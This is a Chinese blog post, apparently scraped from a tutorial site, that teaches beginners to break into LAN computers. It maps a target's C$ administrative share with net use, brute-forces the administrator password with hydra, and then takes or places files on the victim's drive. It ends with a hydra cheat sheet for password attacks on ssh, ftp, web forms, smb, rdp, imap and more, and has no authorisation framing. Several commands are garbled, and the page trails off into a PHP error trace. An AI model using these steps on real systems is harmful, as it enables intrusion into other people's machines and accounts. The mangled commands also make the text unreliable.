admin 管理员组

文章数量: 1184232


2024年4月24日发(作者:jqueryhover一直闪)

给大家分享一个简单且老掉牙的方法去获得目标计算机的C盘。

工具:hydra爆破工具(使用方法在文章末尾)

首先我们需要获取对方的ip,在cmd中输入命令 arp a 或 net view 查看局域

网内其他计算机目标。

假设我们的目标计算机的IP地址是192.168.1.1 我们先ping一下它看是否能联

通 ping 192.168.1.1。在保证其ping通的情况下使用命令 net use

k:192.168.1.1c$其原理其实就是将162.168.1.1的c盘为我们的k盘。当然要保

证其本地开启的共享是否有C盘。查看本地开启的共享可以使用命令 net share。

在输入前面net use k:192.168.1.1c$的命令之后会让你输入该IP下的用户名和

密码。

假设我们通过某些手段得知了该用户名为administrator(其实就是管理员)之后,

我们可以使用hydra来帮助我们进行爆破密码。我们将事先准备好的hydra文件

放入C盘的根目录下,再将事先准备好的字典()放入hydra的文件夹中。

输入命令 cd hydra 回车 -l administrator -p 192.168.1.1回车。

在爆破成功后再次输入命令net use k:192.168.1.1c$并填入用户名和密码,我

们便可以在自己的电脑上看到该用户共享过来的C盘。那么有了C盘我们便可

在这C盘之上放入我们需要的或者是取出我们需要的就好了。

手段比较老但是可以让小白们来试试练练手,其中的命令使用方式在

Windows10中可能不太一样希望自己在查询之后在使用。

以下奉上hydra的一些使用方法:

1、破解ssh:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh

hydra -l 用户名 -p 密码字典 -t 线程 -o -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/

hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get

/admin/

4、post方式提交,破解web登录:

hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form

"/admin/:username=^USER^&password=^PASS^&submit=login:sorry

password"

hydra -t 3 -l admin -P -o -f 10.36.16.18 http-post-form

":id=^USER^&passwd=^PASS^:wrong </p><p style="text-indent: 2em;font-size:18px;">password"

(参数说明:-t同时线程数3,-l用户名是admin,字典,保存为,

username or

-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是

采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的</p><p style="text-indent: 2em;font-size:18px;">返回信息提示。) </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">5、破解https: </p><p style="text-indent: 2em;font-size:18px;">hydra -m / -l muts -P 10.36.16.18 https </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">6、破解teamspeak: </p><p style="text-indent: 2em;font-size:18px;">hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">7、破解cisco: </p><p style="text-indent: 2em;font-size:18px;">hydra -P 10.36.16.18 cisco </p><p style="text-indent: 2em;font-size:18px;">hydra -m cloud -P 10.36.16.18 cisco-enable </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">8、破解smb: </p><p style="text-indent: 2em;font-size:18px;">hydra -l administrator -P 10.36.16.18 smb </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">9、破解pop3: </p><p style="text-indent: 2em;font-size:18px;">hydra -l muts -P pop3 </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">10、破解rdp: </p><p style="text-indent: 2em;font-size:18px;">hydra ip rdp -l administrator -P -V </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">11、破解http-proxy: </p><p style="text-indent: 2em;font-size:18px;">hydra -l admin -P http-proxy://10.36.16.18 </p><p style="text-indent: 2em;font-size:18px;"> </p><p style="text-indent: 2em;font-size:18px;">12、破解imap: </p><p style="text-indent: 2em;font-size:18px;">hydra -L -p secret 10.36.16.18 imap PLAIN </p><p style="text-indent: 2em;font-size:18px;">hydra -C -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN </p></div><br><p><h2></h2></p> <!-- 附件 --> <p class="tag"> 本文标签: <a style="margin-right: 10px" href="/tag/254.html" target="_blank">密码</a> <a style="margin-right: 10px" href="/tag/181.html" target="_blank">使用</a> <a style="margin-right: 10px" href="/tag/217.html" target="_blank">C盘</a> <a style="margin-right: 10px" href="/tag/123604.html" target="_blank">字典</a> <a style="margin-right: 10px" href="/tag/268.html" target="_blank">共享</a> </p> <div class="roclinux-cn copyright"> <blockquote> <p> 版权声明:本文标题:简单的内网渗透教程 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:<a href="http://www.roclinux.cn/b/1713889560a656252.html">http://www.roclinux.cn/b/1713889560a656252.html</a>, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。 </p> </blockquote> </div> </div> <fieldset class="fieldset small notice"><div>Error: Call to undefined function well_tag_thread_find() in /www/wwwroot/roclinux.cn/tmp/view_template_quzhiwa_htm_read.htm:78 Stack trace: #0 /www/wwwroot/roclinux.cn/tmp/route_read.php(205): include() #1 /www/wwwroot/roclinux.cn/tmp/index.inc.php(129): include('/www/wwwroot/ro...') #2 /www/wwwroot/roclinux.cn/index.php(29): include('/www/wwwroot/ro...') #3 {main}</div></fieldset>